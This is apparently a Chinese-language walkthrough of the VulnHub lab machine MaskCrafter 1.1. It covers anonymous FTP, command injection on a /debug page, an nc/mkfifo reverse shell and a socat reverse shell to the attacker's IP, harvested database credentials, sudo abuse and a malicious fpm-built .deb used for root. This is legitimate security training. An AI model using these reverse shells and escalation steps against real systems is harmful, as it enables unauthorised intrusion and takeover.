MASKCRAFTER: 1.1

靶机地址：https://www.vulnhub.com/entry/maskcrafter-11,445/

 

攻击机ip：192.168.99.128
靶机ip：192.168.99.145

获取靶机开放的端口

FTP存在匿名登录，并获取到了两个文件

查看NOTES.txt，/debug目录下可能存在其他东西，并且用户名是admin

 

访问 /debug ，用admin/admin登录成功

页面是命令执行

用burp抓包，丢个反弹shell进去（需要url编码）

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.99.128 1234 >/tmp/f

进入系统之后找到数据库的用户密码

 

进入数据库

mysql -uweb -pP@ssw0rdweb
show databases;
use mydatabase
show tables;
select * from creds;

 

获得压缩包密码 cred12345!!，解压获得新的用户和密码

直接SSH连接登录

ssh userx@192.168.99.145 

查看sudo权限，可以以evdaez身份运行/scripts/whatsmyid.sh

 修改/scripts/whatsmyid.sh 文件内容，切换成evdaez用户

 

现在可以以researcherx身份运行socat

根据这个提权网站的信息，可以用socat来做一个反弹shell

攻击上执行 socat file:`tty`,raw,echo=0 tcp-listen:12345
靶机执行   sudo -u researcherx socat tcp-connect:192.168.99.128:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane

执行之后，将可以获得一个 researcherx 身份的shell

下一步就是提权了

 

在kali上执行以下命令，将生成一个可以获得/bin/sh的恶意文件（我的kali没有fpm命令，sudo gem install fpm

TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

用python临时搭一个web服务器，靶机用wget接收文件

然后执行，获得root权限